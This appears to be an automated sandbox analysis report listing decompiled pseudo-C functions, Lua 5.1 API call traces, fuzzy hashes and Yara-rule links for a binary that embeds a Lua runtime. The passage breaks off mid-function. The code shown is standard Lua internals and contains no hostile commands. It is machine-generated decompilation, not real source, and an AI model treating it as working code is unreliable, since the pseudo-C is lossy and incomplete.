lua_pushvalue.LUA5.1(?,FFFFD8ED), ref: 0099305B
lua_insert.LUA5.1(?,00000001,?,FFFFD8ED), ref: 00993063
lua_gettop.LUA5.1(?,000000FF,00000000), ref: 00993070
lua_pcall.LUA5.1(?,-00000001,00000000), ref: 0099307B
lua_gettop.LUA5.1(?), ref: 009930A8

Part of subcall function 009930C0: lua_type.LUA5.1(0099308D,000000FF,?,0099308D,?), ref: 009930C8
Part of subcall function 009930C0: lua_pushnumber.LUA5.1(0099308D,00000000,3FF00000,0099308D,?), ref: 009930DD
Part of subcall function 009930C0: lua_gettable.LUA5.1(0099308D,000000FE,0099308D,00000000,3FF00000,0099308D,?), ref: 009930E5
Part of subcall function 009930C0: lua_pushnil.LUA5.1(0099308D,0099308D,000000FE,0099308D,00000000,3FF00000,0099308D,?), ref: 009930EB
Part of subcall function 009930C0: lua_insert.LUA5.1(0099308D,000000FE,0099308D,0099308D,000000FE,0099308D,00000000,3FF00000,0099308D,?), ref: 009930F3

lua_error.LUA5.1(?), ref: 0099309C

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_gettop.lua_insert.$lua_error.lua_gettable.lua_pcall.lua_pushnil.lua_pushnumber.lua_pushvalue.lua_type.
String ID:
API String ID: 1431134089-0
Opcode ID: c766117ff7a7e21c4a7e2122d514fc0b9afaadaf975e788fdb391c9689af0a08
Instruction ID: 430c3a7124bfb964dd4930f831f2e57b8d0898c9be4500d4fe6939f5f7b1d534
Opcode Fuzzy Hash: c766117ff7a7e21c4a7e2122d514fc0b9afaadaf975e788fdb391c9689af0a08
Instruction Fuzzy Hash: 9CF0C9A691653026FD12766C3C07FEF21488F91325F184570F91696297FA06EB5740EB

Uniqueness

Uniqueness Score: -1.00%

Function 00A21110, Relevance: 9.0, APIs: 6, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00A21110(void* __eax, void* __ebx, void* __esi, intOrPtr _a4) {
				intOrPtr _t4;

				L00A23F0E();
				if(__eax == 0) {
					L4:
					return 0;
				} else {
					L00A23F08();
					if(__eax == 0) {
						goto L4;
					} else {
						_t4 = _a4;
						_push(_t4);
						_push(0xffffd8f0);
						L00A23F02();
						_push(0xfffffffe);
						_push(0xffffffff);
						L00A23EFC();
						_push(0xfffffffd);
						if(_t4 != 0) {
							L00A23EF6();
							return __eax;
						} else {
							L00A23EF6();
							goto L4;
						}
					}
				}
			}

0x00a21113
0x00a2111f
0x00a2115b
0x00a2115e
0x00a21121
0x00a21123
0x00a2112d
0x00000000
0x00a2112f
0x00a2112f
0x00a21133
0x00a21134
0x00a2113a
0x00a2113f
0x00a21141
0x00a21144
0x00a2114e
0x00a21151
0x00a2115f
0x00a2116a
0x00a21153
0x00a21153
0x00000000
0x00a21158
0x00a21151
0x00a2112d

APIs

lua_touserdata.LUA5.1(?,00000001,?,00A22DF6,alien_buffer), ref: 00A21113
lua_getmetatable.LUA5.1(?,00000001), ref: 00A21123
lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 00A2113A
lua_rawequal.LUA5.1(?,000000FF,000000FE,?,FFFFD8F0,?), ref: 00A21144
lua_settop.LUA5.1(?,000000FD), ref: 00A21153
lua_settop.LUA5.1(?,000000FD), ref: 00A2115F

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_settop.$lua_getfield.lua_getmetatable.lua_rawequal.lua_touserdata.
String ID:
API String ID: 3874516477-0
Opcode ID: 308fa86939892b2da246c52da84e4241826dfeefe53ccbfc2c1f6500d3fdfdcd
Instruction ID: a44ab599b387cad9cd7f4fa2c78c483168d4ed9e9d809b9b92b185d0056fe81c
Opcode Fuzzy Hash: 308fa86939892b2da246c52da84e4241826dfeefe53ccbfc2c1f6500d3fdfdcd
Instruction Fuzzy Hash: FAE06DA3A1C432365D11322C3E03D6F159D8DE3371B690338FD24957C9F9198F1A41BA

Uniqueness

Uniqueness Score: -1.00%

Function 10014090, Relevance: 9.0, APIs: 6, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E10014090(void* __ebx, void* __eflags, intOrPtr _a4) {
				void* _t5;
				intOrPtr _t11;
				void* _t12;
				intOrPtr _t13;
				void* _t14;
				void* _t15;
				void* _t20;

				_t17 = __eflags;
				_t10 = __ebx;
				_t13 = _a4;
				E1000F410(__ebx, __eflags, _t13, 1, 5);
				_t12 = E10001770(__ebx, __eflags, _t13, 1);
				E1000F3E0(_t13, 0x28, 0x1001ab10);
				_t5 = E10001410(_t17, _t13, 2);
				_t15 = _t14 + 0x28;
				_t18 = _t5;
				if(_t5 > 0) {
					E1000F410(_t10, _t18, _t13, 2, 6);
					_t15 = _t15 + 0xc;
				}
				E10001160(_t13, 2);
				_push(_t12);
				_push(1);
				_push(_t13);
				E100140F0(_t11, _t20);
				return 0;
			}

0x10014090
0x10014090
0x10014091
0x1001409b
0x100140b0
0x100140b2
0x100140ba
0x100140bf
0x100140c2
0x100140c4
0x100140cb
0x100140d0
0x100140d0
0x100140d6
0x100140db
0x100140dc
0x100140de
0x100140df
0x100140eb

APIs

luaL_checktype.LUA5.1(?,00000001,00000005), ref: 1001409B

Part of subcall function 1000F410: lua_type.LUA5.1(?,?), ref: 1000F41C

lua_objlen.LUA5.1(?,00000001,?,00000001,00000005), ref: 100140A3
luaL_checkstack.LUA5.1(?,00000028,1001AB10,?,00000001,?,00000001,00000005), ref: 100140B2

Part of subcall function 1000F3E0: lua_checkstack.LUA5.1(?,?), ref: 1000F3EB
Part of subcall function 1000F3E0: luaL_error.LUA5.1(?,stack overflow (%s),?), ref: 1000F402

lua_type.LUA5.1(?,00000002,?,00000028,1001AB10,?,00000001,?,00000001,00000005), ref: 100140BA
luaL_checktype.LUA5.1(?,00000002,00000006), ref: 100140CB
lua_settop.LUA5.1(?,00000002), ref: 100140D6

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checktype.lua_type.$L_checkstack.L_error.lua_checkstack.lua_objlen.lua_settop.
String ID:
API String ID: 3078066390-0
Opcode ID: f240f2d54f64836eeffede150dfa05b4051c4c2cc95f63eac0f64b8de2bb5f86
Instruction ID: 67fd905511d9e9f20ec9fd6d3d5db2b0a6b9d656d49aa7d8d6768c1972ccc8cb
Opcode Fuzzy Hash: f240f2d54f64836eeffede150dfa05b4051c4c2cc95f63eac0f64b8de2bb5f86
Instruction Fuzzy Hash: F2F06D6DB9662031F431A1253C4BFCF118DCF86BD5F014424B700BA1CBEAE6B6D201AA

Uniqueness

Uniqueness Score: -1.00%

Function 1000F630, Relevance: 9.0, APIs: 6, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000F630(void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t5;

				_t14 = _a4;
				_t5 = E10001CC0(__eflags, _a4, _a8);
				if(_t5 != 0) {
					E10001980(_a12, _t14, _a12);
					E10001BF0(__eflags, __fp0, _t14, 0xfffffffe);
					__eflags = E10001410(__eflags, _t14, 0xffffffff);
					if(__eflags != 0) {
						E100011B0(__eflags, _t14, 0xfffffffe);
						return 1;
					} else {
						E10001160(_t14, 0xfffffffd);
						__eflags = 0;
						return 0;
					}
				} else {
					return _t5;
				}
			}

0x1000f635
0x1000f63b
0x1000f645
0x1000f64f
0x1000f657
0x1000f667
0x1000f669
0x1000f67d
0x1000f68b
0x1000f66b
0x1000f66e
0x1000f676
0x1000f679
0x1000f679
0x1000f648
0x1000f648
0x1000f648

APIs

lua_getmetatable.LUA5.1(?,?), ref: 1000F63B
lua_pushstring.LUA5.1(?,?), ref: 1000F64F
lua_rawget.LUA5.1(?,000000FE,?,?), ref: 1000F657
lua_type.LUA5.1(?,000000FF,?,000000FE,?,?), ref: 1000F65F
lua_settop.LUA5.1(?,000000FD), ref: 1000F66E

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_getmetatable.lua_pushstring.lua_rawget.lua_settop.lua_type.
String ID:
API String ID: 1082009019-0
Opcode ID: 0c6d903d25db60788e1f1af913689dd48f1d29e6d288e5af5f2bd1ab785a17a8
Instruction ID: 57cf5f7c9982df1ce4461b2f1fe043414c9d5d188cb73654464fa66cb5ec864b
Opcode Fuzzy Hash: 0c6d903d25db60788e1f1af913689dd48f1d29e6d288e5af5f2bd1ab785a17a8
Instruction Fuzzy Hash: 0BF0657A51D53236B901F2287C02EDF2189CF461F5F150718F934A11EEFB05BA8201EA

Uniqueness

Uniqueness Score: -1.00%

Function 1000F310, Relevance: 9.0, APIs: 6, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000F310(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _t11;

				_t17 = __eflags;
				_t13 = _a4;
				_t12 = _a8;
				E10001B90(_t11, __eflags, _a4, 0xffffd8f0, _a8);
				if(E10001410(_t17, _a4, 0xffffffff) == 0) {
					E10001160(_t13, 0xfffffffe);
					E10001C70(_t13, 0, 0);
					E100013D0(__eflags, _t13, 0xffffffff);
					E10001DD0(_t11, __eflags, _t13, 0xffffd8f0, _t12);
					return 1;
				} else {
					return 0;
				}
			}

0x1000f310
0x1000f311
0x1000f316
0x1000f321
0x1000f333
0x1000f33d
0x1000f347
0x1000f34f
0x1000f35b
0x1000f36a
0x1000f336
0x1000f339
0x1000f339

APIs

lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 1000F321

Part of subcall function 10001B90: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001BBA

lua_type.LUA5.1(?,000000FF,?,FFFFD8F0,?), ref: 1000F329
lua_settop.LUA5.1(?,000000FE), ref: 1000F33D
lua_createtable.LUA5.1(?,00000000,00000000,?,000000FE), ref: 1000F347
lua_pushvalue.LUA5.1(?,000000FF,?,00000000,00000000,?,000000FE), ref: 1000F34F
lua_setfield.LUA5.1(?,FFFFD8F0,?,?,000000FF,?,00000000,00000000,?,000000FE), ref: 1000F35B

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: S_newlstr.lua_createtable.lua_getfield.lua_pushvalue.lua_setfield.lua_settop.lua_type.
String ID:
API String ID: 1309023193-0
Opcode ID: f8bf732c72701ab3cb6acabffcc9f19b3aa9fba09e19ed965c60beb132ff687d
Instruction ID: cfc6d2e363df59b7b58c6ee9dcece5fe58cf5bf0b6d7dbfd8842f9ef0d253916
Opcode Fuzzy Hash: f8bf732c72701ab3cb6acabffcc9f19b3aa9fba09e19ed965c60beb132ff687d
Instruction Fuzzy Hash: 87E0393A60963135F901A12A7C02FDF22488FC36F0F210725F520B22DAAA44B68242EE

Uniqueness

Uniqueness Score: -1.00%

Function 10010920, Relevance: 9.0, APIs: 6, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10010920(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _t2;
				void* _t4;
				void* _t9;
				void* _t13;
				void* _t14;

				_t16 = __eflags;
				_t12 = _a4;
				_t2 = E1000F4E0(__ecx, __eflags, _a4, 1, 0, 0);
				_t9 = E10001150(_a4);
				_t4 = E1000FD30(_t16, _t12, _t2);
				_t14 = _t13 + 0x1c;
				if(_t4 != 0) {
					E10002370(_t12);
					_t14 = _t14 + 4;
				}
				E10002070(_t12, 0, 0xffffffff);
				return E10001150(_t12) - _t9;
			}

0x10010920
0x10010922
0x1001092e
0x1001093d
0x1001093f
0x10010944
0x10010949
0x1001094c
0x10010951
0x10010951
0x10010959
0x1001096c

APIs

luaL_optlstring.LUA5.1(?,00000001,00000000,00000000), ref: 1001092E

Part of subcall function 1000F4E0: lua_type.LUA5.1(?,?,?,?,1000F27E,?,?,?,00000000), ref: 1000F4EC

lua_gettop.LUA5.1(?,?,00000001,00000000,00000000), ref: 10010936
luaL_loadfile.LUA5.1(?,00000000,?,?,00000001,00000000,00000000), ref: 1001093F

Part of subcall function 1000FD30: lua_gettop.LUA5.1(?), ref: 1000FD42
Part of subcall function 1000FD30: lua_pushlstring.LUA5.1(?,=stdin,00000006), ref: 1000FD76
Part of subcall function 1000FD30: getc.MSVCRT(00000000), ref: 1000FD8E
Part of subcall function 1000FD30: getc.MSVCRT(?), ref: 1000FDA5
Part of subcall function 1000FD30: getc.MSVCRT(?), ref: 1000FDB9
Part of subcall function 1000FD30: getc.MSVCRT(?), ref: 1000FDCD
Part of subcall function 1000FD30: fclose.MSVCRT ref: 1000FDF4
Part of subcall function 1000FD30: fopen.MSVCRT ref: 1000FE00

lua_error.LUA5.1(?), ref: 1001094C
lua_call.LUA5.1(?,00000000,000000FF), ref: 10010959
lua_gettop.LUA5.1(?,?,00000000,000000FF), ref: 1001095F

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: getc$lua_gettop.$L_loadfile.L_optlstring.fclosefopenlua_call.lua_error.lua_pushlstring.lua_type.
String ID:
API String ID: 191521372-0
Opcode ID: 198e4eb2da71497eb4ee9c89cc89cd917f467ca40e47ded298f27a066b816a33
Instruction ID: c5097f16452a8b879fee426c183662050945d10c2c3b891539c13d037270f874
Opcode Fuzzy Hash: 198e4eb2da71497eb4ee9c89cc89cd917f467ca40e47ded298f27a066b816a33
Instruction Fuzzy Hash: 30E0487AB1662032F621A1B91C47FDF114DCFC66F8F140525F710B62CBE995B60141FA

Uniqueness

Uniqueness Score: -1.00%

Function 00992F70, Relevance: 9.0, APIs: 6, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00992F70(void* __eax, intOrPtr _a4) {
				intOrPtr _t5;

				_t5 = _a4;
				_push(1);
				_push(_t5);
				L00994B18();
				if(__eax != 0) {
					_push(_t5);
					L00994B60();
					return __eax;
				} else {
					_push(0xffffd8ed);
					_push(_t5);
					L00994B90();
					_push(0);
					_push(0);
					_push(0);
					_push(_t5);
					L00994BAE();
					_push(2);
					_push(_t5);
					L00994AB8();
					E00992FD0(__eax, _t5);
					_push(_t5);
					L00994AEE();
					return 0;
				}
			}

0x00992f71
0x00992f75
0x00992f77
0x00992f78
0x00992f82
0x00992fb6
0x00992fb7
0x00992fc0
0x00992f84
0x00992f84
0x00992f89
0x00992f8a
0x00992f8f
0x00992f91
0x00992f93
0x00992f95
0x00992f96
0x00992f9b
0x00992f9d
0x00992f9e
0x00992fa4
0x00992fa9
0x00992faa
0x00992fb5
0x00992fb5

APIs

lua_toboolean.LUA5.1(?,00000001), ref: 00992F78
lua_pushvalue.LUA5.1(?,FFFFD8ED), ref: 00992F8A
lua_pcall.LUA5.1(?,00000000,00000000,00000000,?,FFFFD8ED), ref: 00992F96
lua_settop.LUA5.1(?,00000002,?,00000000,00000000,00000000,?,FFFFD8ED), ref: 00992F9E

Part of subcall function 00992FD0: lua_createtable.LUA5.1(?,00000000,00000000,?,00992FA9,?,?,00000002,?,00000000,00000000,00000000,?,FFFFD8ED), ref: 00992FDA
Part of subcall function 00992FD0: lua_pushnumber.LUA5.1(?,00000000,3FF00000,?,00000000,00000000,?,00992FA9,?,?,00000002,?,00000000,00000000,00000000,?), ref: 00992FE7
Part of subcall function 00992FD0: lua_pushvalue.LUA5.1(?,000000FD,?,00000000,3FF00000,?,00000000,00000000,?,00992FA9,?,?,00000002,?,00000000,00000000), ref: 00992FEF
Part of subcall function 00992FD0: lua_settable.LUA5.1(?,000000FD,?,000000FD,?,00000000,3FF00000,?,00000000,00000000,?,00992FA9,?,?,00000002,?), ref: 00992FF7
Part of subcall function 00992FD0: lua_insert.LUA5.1(?,000000FE,?,000000FD,?,000000FD,?,00000000,3FF00000,?,00000000,00000000,?,00992FA9,?,?), ref: 00992FFF
Part of subcall function 00992FD0: lua_settop.LUA5.1(?,000000FE,?,000000FE,?,000000FD,?,000000FD,?,00000000,3FF00000,?,00000000,00000000,?,00992FA9), ref: 00993007

lua_error.LUA5.1(?,?,?,00000002,?,00000000,00000000,00000000,?,FFFFD8ED), ref: 00992FAA
lua_gettop.LUA5.1(?), ref: 00992FB7

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushvalue.lua_settop.$lua_createtable.lua_error.lua_gettop.lua_insert.lua_pcall.lua_pushnumber.lua_settable.lua_toboolean.
String ID:
API String ID: 132685617-0
Opcode ID: 2b8c06ec438556d4617b2e4a397e67ba41ce0e7fd8a7ad9ef2ebb17f5a97adc5
Instruction ID: 61efce68b8bed81c8f771afcd678b1fd3fa8d58b13ed5b997494ca625d2d644a
Opcode Fuzzy Hash: 2b8c06ec438556d4617b2e4a397e67ba41ce0e7fd8a7ad9ef2ebb17f5a97adc5
Instruction Fuzzy Hash: 6FE0B672A9BA3032ED63726C7C03FCF11480F96716F190024FA0579186EA89E68741EF

Uniqueness

Uniqueness Score: -1.00%

Function 10010AC0, Relevance: 9.0, APIs: 6, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10010AC0(void* __ebx, void* __eflags, intOrPtr _a4) {

				_t14 = _a4;
				E1000F470(__ebx, __eflags, _a4, 1);
				_t3 = E100020B0(_t14, E10001150(_t14) - 1, 0xffffffff, 0) == 0;
				E10001AE0(_t14, 0 | E100020B0(_t14, E10001150(_t14) - 1, 0xffffffff, 0) == 0x00000000);
				E100012B0(_t3, _t14, 1);
				return E10001150(_t14);
			}

0x10010ac1
0x10010ac8
0x10010ae9
0x10010aee
0x10010af6
0x10010b05

APIs

luaL_checkany.LUA5.1(?,00000001), ref: 10010AC8

Part of subcall function 1000F470: lua_type.LUA5.1(?,?), ref: 1000F47C
Part of subcall function 1000F470: luaL_argerror.LUA5.1(?,?,value expected), ref: 1000F490

lua_gettop.LUA5.1(?,000000FF,00000000), ref: 10010AD5
lua_pcall.LUA5.1(?,-00000001,00000000), ref: 10010AE0
lua_pushboolean.LUA5.1(?,00000000,?,-00000001,00000000), ref: 10010AEE
lua_insert.LUA5.1(?,00000001,?,00000000,?,-00000001,00000000), ref: 10010AF6
lua_gettop.LUA5.1(?,?,00000001,?,00000000,?,-00000001,00000000), ref: 10010AFC

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_gettop.$L_argerror.L_checkany.lua_insert.lua_pcall.lua_pushboolean.lua_type.
String ID:
API String ID: 3952743895-0
Opcode ID: a1010f6f3a6869adac9ae1bd4224f6108250bab7645d8b46e2eb3363489cdefc
Instruction ID: 0f8f0ae0e5508f88beaffb032e71ad8d705b35c423952fc95e27307fc3d835de
Opcode Fuzzy Hash: a1010f6f3a6869adac9ae1bd4224f6108250bab7645d8b46e2eb3363489cdefc
Instruction Fuzzy Hash: AFE04FB9516A2031F516A2242C03FEF104DCF462D0F040114F911602CAEB85765100EB

Uniqueness

Uniqueness Score: -1.00%

Function 00992FD0, Relevance: 9.0, APIs: 6, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E00992FD0(void* __eax, intOrPtr _a4) {
				intOrPtr _t3;

				_t3 = _a4;
				_push(0);
				_push(0);
				_push(_t3);
				L00994ACA();
				_push(0x3ff00000);
				_push(0);
				_push(_t3);
				L00994B5A();
				_push(0xfffffffd);
				_push(_t3);
				L00994B90();
				_push(0xfffffffd);
				_push(_t3);
				L00994B42();
				_push(0xfffffffe);
				_push(_t3);
				L00994BB4();
				_push(0xfffffffe);
				_push(_t3);
				L00994AB8();
				return __eax;
			}

0x00992fd1
0x00992fd5
0x00992fd7
0x00992fd9
0x00992fda
0x00992fdf
0x00992fe4
0x00992fe6
0x00992fe7
0x00992fec
0x00992fee
0x00992fef
0x00992ff4
0x00992ff6
0x00992ff7
0x00992ffc
0x00992ffe
0x00992fff
0x00993004
0x00993006
0x00993007
0x00993010

APIs

lua_createtable.LUA5.1(?,00000000,00000000,?,00992FA9,?,?,00000002,?,00000000,00000000,00000000,?,FFFFD8ED), ref: 00992FDA
lua_pushnumber.LUA5.1(?,00000000,3FF00000,?,00000000,00000000,?,00992FA9,?,?,00000002,?,00000000,00000000,00000000,?), ref: 00992FE7
lua_pushvalue.LUA5.1(?,000000FD,?,00000000,3FF00000,?,00000000,00000000,?,00992FA9,?,?,00000002,?,00000000,00000000), ref: 00992FEF
lua_settable.LUA5.1(?,000000FD,?,000000FD,?,00000000,3FF00000,?,00000000,00000000,?,00992FA9,?,?,00000002,?), ref: 00992FF7
lua_insert.LUA5.1(?,000000FE,?,000000FD,?,000000FD,?,00000000,3FF00000,?,00000000,00000000,?,00992FA9,?,?), ref: 00992FFF
lua_settop.LUA5.1(?,000000FE,?,000000FE,?,000000FD,?,000000FD,?,00000000,3FF00000,?,00000000,00000000,?,00992FA9), ref: 00993007

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_createtable.lua_insert.lua_pushnumber.lua_pushvalue.lua_settable.lua_settop.
String ID:
API String ID: 1542408278-0
Opcode ID: 9a75a7db4fa6a72553e3877a4417746ac3a07eb557aff2437efc4e64d49b8948
Instruction ID: bd16d9fd48354c10160bf92eea797e005193291677347d999c7b0098975aa67a
Opcode Fuzzy Hash: 9a75a7db4fa6a72553e3877a4417746ac3a07eb557aff2437efc4e64d49b8948
Instruction Fuzzy Hash: 89E0482158EA3A31DC63762C6C02F8E52491F9B735F390340BA35361EA5A48A64315EE

Uniqueness

Uniqueness Score: -1.00%

Function 10013B80, Relevance: 9.0, APIs: 6, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E10013B80(void* __ebx, long long __fp0, intOrPtr _a4) {
				void* _t2;
				void* _t3;
				void* _t8;
				void* _t12;
				long long _t13;

				_t13 = __fp0;
				_t7 = _a4;
				_t2 = E1000F590(__ebx, _t12, _a4, 2, 0);
				L10016E30();
				_t3 = E1000F540(__ebx, _t12, _t13, _a4, 1);
				L10016E30();
				__imp__difftime(0);
				 *((long long*)(_t8 + 0x18)) = _t13;
				E100018E0(_t7, _t3, _t2);
				return 1;
			}

0x10013b80
0x10013b81
0x10013b8c
0x10013b94
0x10013b9d
0x10013ba5
0x10013bab
0x10013bb1
0x10013bb5
0x10013bc3

APIs

luaL_optnumber.LUA5.1(?,00000002,00000000,00000000), ref: 10013B8C

Part of subcall function 1000F590: lua_type.LUA5.1(?,?), ref: 1000F59C

_ftol.MSVCRT ref: 10013B94
luaL_checknumber.LUA5.1(?,00000001,00000000), ref: 10013B9D

Part of subcall function 1000F540: lua_tonumber.LUA5.1(?,?), ref: 1000F54F
Part of subcall function 1000F540: lua_isnumber.LUA5.1(?,?), ref: 1000F56C

_ftol.MSVCRT ref: 10013BA5
difftime.MSVCRT ref: 10013BAB
lua_pushnumber.LUA5.1(?,?,00000000), ref: 10013BB5

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: _ftol$L_checknumber.L_optnumber.difftimelua_isnumber.lua_pushnumber.lua_tonumber.lua_type.
String ID:
API String ID: 4224803489-0
Opcode ID: 3670eda97d49acb39907d3fc559a450795f385b7fd3076b83fc2dec503259ce7
Instruction ID: e2e57f985c1257931ee9efb8c31909de6f86976510c2466880577440819b7b26
Opcode Fuzzy Hash: 3670eda97d49acb39907d3fc559a450795f385b7fd3076b83fc2dec503259ce7
Instruction Fuzzy Hash: 92E0C27D95052072F510B7E4BC43FDE3998EF58340F000450F644AA2C3E9B57A9142AB

Uniqueness

Uniqueness Score: -1.00%

Function 10008DD0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 128
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10008DD0(signed int __ecx, char* _a4, char* _a8, int _a12) {
				char _t16;
				int _t17;
				char _t26;
				char* _t30;
				char* _t31;
				char* _t32;
				int _t36;
				char* _t37;
				signed int _t38;
				signed int _t40;
				signed int _t43;
				signed int _t47;
				signed int _t49;
				signed int _t52;
				signed int _t59;
				signed int _t61;
				signed int _t64;
				char _t68;
				char _t69;
				char _t70;
				signed int _t71;
				signed int _t72;
				signed int _t73;
				char* _t74;
				char* _t82;
				char* _t99;
				void* _t100;
				void* _t101;
				void* _t103;
				void* _t104;
				int _t105;
				char* _t106;
				void* _t107;
				void* _t108;

				_t31 = _a8;
				_t16 =  *_t31;
				if(_t16 != 0x3d) {
					if(_t16 != 0x40) {
						_t17 = strcspn(_t31, "\n\r");
						_t108 = _t107 + 8;
						_t36 = _a12 - 0x11;
						if(_t17 > _t36) {
							_t17 = _t36;
						}
						_t106 = _a4;
						_t68 = "[string \""; // 0x7274735b
						_t37 = _t106;
						 *_t37 = _t68;
						_t69 =  *0x100194bc; // 0x20676e69
						_t37[4] = _t69;
						_t70 =  *0x100194c0; // 0x22
						_t37[8] = _t70;
						_t38 = _t31[_t17];
						if(_t38 == 0) {
							_t74 = _t31;
						} else {
							strncat(_t106, _t31, _t17);
							_t108 = _t108 + 0xc;
							_t74 = 0x100192d8;
						}
						asm("repne scasb");
						_t40 =  !(_t38 | 0xffffffff);
						_t100 = _t74 - _t40;
						_t71 = _t40;
						asm("repne scasb");
						_t43 = _t71 >> 2;
						memcpy(_t106 - 1, _t100, _t43 << 2);
						memcpy(_t100 + _t43 + _t43, _t100, _t71 & 0x00000003);
						_t107 = _t108 + 0x18;
						_t47 = 0;
						_t82 = "\"]";
					} else {
						_t32 =  &(_t31[1]);
						_t103 = _a12 - 8;
						asm("repne scasb");
						_t106 = _a4;
						_t26 =  *0x1001ab10; // 0x0
						_t47 =  !(__ecx | 0xffffffff) - 1;
						 *_t106 = _t26;
						if(_t47 > _t103) {
							_t59 = _t47 - _t103;
							_t32 =  &(_t32[_t59]);
